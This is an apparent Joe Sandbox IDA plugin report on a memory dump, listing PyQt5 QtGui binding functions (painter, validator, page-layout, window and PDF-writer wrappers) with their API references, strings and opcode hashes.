Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Pixmap$?drawFlags@FragmentFragment@1@Fragments@Hint@Painter@@Painter@@@@@Pixmap@@
String ID: B>J9|J1$QPainter$drawPixmapFragments$drawPixmapFragments(self, fragments: Optional[PyQt5.sip.array[QPainter.PixmapFragment]], pixmap: QPixmap, hints: QPainter.PixmapFragmentHints = 0)
API String ID: 3267671324-988154718
Opcode ID: 19adfca3306ca2218b6d83e6ea3f82f5d9b966077fd1b572a3e203ec86a1db3b
Instruction ID: 7f520c94310c5c4d22da66c562a8849dd88933b3348802d1ab0905c38fe41593
Opcode Fuzzy Hash: 19adfca3306ca2218b6d83e6ea3f82f5d9b966077fd1b572a3e203ec86a1db3b
Instruction Fuzzy Hash: 1F41BF7670AF45C9DB108F29E8942AD33B8FB48B98F510536EA4D43B28EF38D964C714

Function 00007FFD86284D40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFD86284D67
??YQVector3D@@QEAAAEAV0@AEBV0@@Z.QT5GUI ref: 00007FFD86284DF8
_Py_Dealloc.PYTHON3 ref: 00007FFD86284E2C
PyErr_Clear.PYTHON3 ref: 00007FFD86284E40

Strings

1J9, xrefs: 00007FFD86284DC8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ClearDeallocErr_SubtypeType_V0@@Vector3
String ID: 1J9
API String ID: 4166087171-2407233842
Opcode ID: 81624ed7349e66f4b242cc738d7a5dd58e0e7ffe7d78f7f6af4d6cc1aec1ecd7
Instruction ID: 0f4291109b416b0f1f38939e6a3a7c5dd94c3a2fdacfab5a245194b502aa545a
Opcode Fuzzy Hash: 81624ed7349e66f4b242cc738d7a5dd58e0e7ffe7d78f7f6af4d6cc1aec1ecd7
Instruction Fuzzy Hash: 6B31DD66B0CA5681EB51DB1AF85526DA370FB88BE4F484432DE4D03B64EF3CE885C710

Function 00007FFD862B2CE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

?setRange@QDoubleValidator@@UEAAXNNH@Z.QT5GUI ref: 00007FFD862B2DD5

Strings

QDoubleValidator, xrefs: 00007FFD862B2E17
setRange, xrefs: 00007FFD862B2E10
setRange(self, minimum: float, maximum: float, decimals: int = 0), xrefs: 00007FFD862B2E04
Bdd|i, xrefs: 00007FFD862B2D82

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setDoubleRange@Validator@@
String ID: Bdd|i$QDoubleValidator$setRange$setRange(self, minimum: float, maximum: float, decimals: int = 0)
API String ID: 2261663038-4066516864
Opcode ID: 456b900ba7fe1cd0c7978aeddb5caa6125bf10b3669669645997f3b5d4f659fa
Instruction ID: ca0b4e23c88d84b5945e63aec1cda879e9ad6d45169af39567e560873bd1e0bc
Opcode Fuzzy Hash: 456b900ba7fe1cd0c7978aeddb5caa6125bf10b3669669645997f3b5d4f659fa
Instruction Fuzzy Hash: 94313A3270DB86D9EA508F15F4543AA77A4FB85BA4F544132DA8D03B28EF3CD959CB40

Function 00007FFD86226DB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

?margins@QPageLayout@@QEBA?AVQMarginsF@@XZ.QT5GUI ref: 00007FFD86226E0C
?margins@QPageLayout@@QEBA?AVQMarginsF@@W4Unit@1@@Z.QT5GUI ref: 00007FFD86226E9A

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

margins(self) -> QMarginsFmargins(self, units: QPageLayout.Unit) -> QMarginsF, xrefs: 00007FFD86226EC7
QPageLayout, xrefs: 00007FFD86226EDA
margins, xrefs: 00007FFD86226ED3

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?margins@Layout@@MarginsPage$Unit@1@@malloc
String ID: QPageLayout$margins$margins(self) -> QMarginsFmargins(self, units: QPageLayout.Unit) -> QMarginsF
API String ID: 339743652-18921181
Opcode ID: 48dfbfa802422bde5870280b4a8d3f121f2966e5280e62cc7a110741b0e1a915
Instruction ID: de20116e81ac35225313fdd3d5e08bb505f54da6f60a7e141896e7eaee6d4fa1
Opcode Fuzzy Hash: 48dfbfa802422bde5870280b4a8d3f121f2966e5280e62cc7a110741b0e1a915
Instruction Fuzzy Hash: 53314B76B18B4682EB00DF19E8A86AD73A5FB88BA0F540172DA4D07760DF3CD985CB00

Function 00007FFD8624C230 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

?parent@QWindow@@QEBAPEAV1@XZ.QT5GUI ref: 00007FFD8624C27F
?parent@QWindow@@QEBAPEAV1@W4AncestorMode@1@@Z.QT5GUI ref: 00007FFD8624C2FF

Strings

QWindow, xrefs: 00007FFD8624C33F
parent, xrefs: 00007FFD8624C338
parent(self) -> Optional[QWindow]parent(self, mode: QWindow.AncestorMode) -> Optional[QWindow], xrefs: 00007FFD8624C32C

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?parent@Window@@$AncestorMode@1@@
String ID: QWindow$parent$parent(self) -> Optional[QWindow]parent(self, mode: QWindow.AncestorMode) -> Optional[QWindow]
API String ID: 1132137108-730466559
Opcode ID: 3cabe289b61b37d8099fd50f0ef2b2bb8cc1533a2de2c83fb89eecc68b1bf9b8
Instruction ID: 3ea282e99a2ccb1ce8ca31b05015907ea3a7ceb5ebe34320d6fcb3da07c4db85
Opcode Fuzzy Hash: 3cabe289b61b37d8099fd50f0ef2b2bb8cc1533a2de2c83fb89eecc68b1bf9b8
Instruction Fuzzy Hash: 14312D76B18B4682EB40CF19F8A86AD33A4FB88BA4F544132DA4D43724DF3CD999C700

Function 00007FFD862AEE30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

?definitionSize@QPageSize@@QEBA?AVQSizeF@@XZ.QT5GUI ref: 00007FFD862AEE8C
?definitionSize@QPageSize@@SA?AVQSizeF@@W4PageSizeId@1@@Z.QT5GUI ref: 00007FFD862AEEF4

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

Strings

definitionSize, xrefs: 00007FFD862AEF2D
QPageSize, xrefs: 00007FFD862AEF34
definitionSize(self) -> QSizeFdefinitionSize(pageSizeId: QPageSize.PageSizeId) -> QSizeF, xrefs: 00007FFD862AEF21

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: PageSize$?definitionSize@Size@@$Id@1@@malloc
String ID: QPageSize$definitionSize$definitionSize(self) -> QSizeFdefinitionSize(pageSizeId: QPageSize.PageSizeId) -> QSizeF
API String ID: 3577021666-1440656622
Opcode ID: e7654054ab782b391ec4039f873d1ef7e8ed2d5af33f0cbf7b92f1614ff11ff6
Instruction ID: a49449a7b5cc1ec89a82dc246f693035c4150f85dc5408bb199a0699b41cc6d6
Opcode Fuzzy Hash: e7654054ab782b391ec4039f873d1ef7e8ed2d5af33f0cbf7b92f1614ff11ff6
Instruction Fuzzy Hash: 94314876B08A4A82EB009F55E8686BD73A5FF88BA4F544072DE4D47360DF7CD989C740

Function 00007FFD86234F70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60COMMON

Download Yara Rule

APIs

?draw@QTextLine@@QEBAXPEAVQPainter@@AEBVQPointF@@PEBUFormatRange@QTextLayout@@@Z.QT5GUI ref: 00007FFD86235036

Strings

BJ8J1|J8, xrefs: 00007FFD86234FE4
draw, xrefs: 00007FFD8623508F
draw(self, painter: Optional[QPainter], position: Union[QPointF, QPoint], selection: Optional[QTextLayout.FormatRange] = None), xrefs: 00007FFD86235080
QTextLine, xrefs: 00007FFD86235096

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?draw@FormatLayout@@@Line@@Painter@@PointRange@
String ID: BJ8J1|J8$QTextLine$draw$draw(self, painter: Optional[QPainter], position: Union[QPointF, QPoint], selection: Optional[QTextLayout.FormatRange] = None)
API String ID: 2457315882-2488276419
Opcode ID: bf428202a0065a0e227e67f4a087b7923cc647b075cc47a2ab002b8a168f2969
Instruction ID: c46005900d71251d4c8e581b5897d9df5a7c25b2c85dc77dbce36f5d1e18fd39
Opcode Fuzzy Hash: bf428202a0065a0e227e67f4a087b7923cc647b075cc47a2ab002b8a168f2969
Instruction Fuzzy Hash: F031B136B1DF4585EB609F55E8983AD33A8FB48BA0F91413ACA9D43720EF39D959C700

Function 00007FFD86274F70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57COMMON

Download Yara Rule

APIs

?setPageSizeMM@QPdfWriter@@UEAAXAEBVQSizeF@@@Z.QT5GUI ref: 00007FFD8627500F

Strings

BJ9, xrefs: 00007FFD86274FC0
setPageSizeMM(self, size: QSizeF), xrefs: 00007FFD8627503B
QPdfWriter, xrefs: 00007FFD8627504E
setPageSizeMM, xrefs: 00007FFD86275047

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Size$?setF@@@PageWriter@@
String ID: BJ9$QPdfWriter$setPageSizeMM$setPageSizeMM(self, size: QSizeF)
API String ID: 2211057151-27497326
Opcode ID: 59982e25cdd2874e3ab27bb2311e5a8cd574384738755b96d645616c18ea7f8e
Instruction ID: ba10dd40f567d1a73abb2a204df6b41c8b41e66d5e315af640f9fcd4cd713df9
Opcode Fuzzy Hash: 59982e25cdd2874e3ab27bb2311e5a8cd574384738755b96d645616c18ea7f8e
Instruction Fuzzy Hash: AA211D72B0CB4682EB009B19E8646AE77B4FB84BA4F540172DA8D43B74EF3CE845D740

Function 00007FFD8622ACF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57COMMON

Download Yara Rule

APIs

?setRange@QIntValidator@@UEAAXHH@Z.QT5GUI ref: 00007FFD8622AD8D

Strings

setRange, xrefs: 00007FFD8622ADC5
QIntValidator, xrefs: 00007FFD8622ADCC
Bii, xrefs: 00007FFD8622AD43
setRange(self, bottom: int, top: int), xrefs: 00007FFD8622ADB9

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?setRange@Validator@@
String ID: Bii$QIntValidator$setRange$setRange(self, bottom: int, top: int)
API String ID: 2470182848-2107186230
Opcode ID: 27317e3deb30f355159556bdcea4340bb20deff64c34b3b8711ee68611b74a96
Instruction ID: 10e0d502350f6908cc619ab5b847b09d001605777c80c73017c1dc2bee938a8e
Opcode Fuzzy Hash: 27317e3deb30f355159556bdcea4340bb20deff64c34b3b8711ee68611b74a96
Instruction Fuzzy Hash: 8821FE3170CB4686EA109F15E4642AAB7B4FB84BA4F540172DA8D03B78EF3CE985C740

Function 00007FFD86264E70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@@Z.QT5GUI ref: 00007FFD86264F0B

Strings

BJ8, xrefs: 00007FFD86264EC0
QWindow, xrefs: 00007FFD86264F4D
mouseMoveEvent(self, a0: Optional[QMouseEvent]), xrefs: 00007FFD86264F3A
mouseMoveEvent, xrefs: 00007FFD86264F46

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
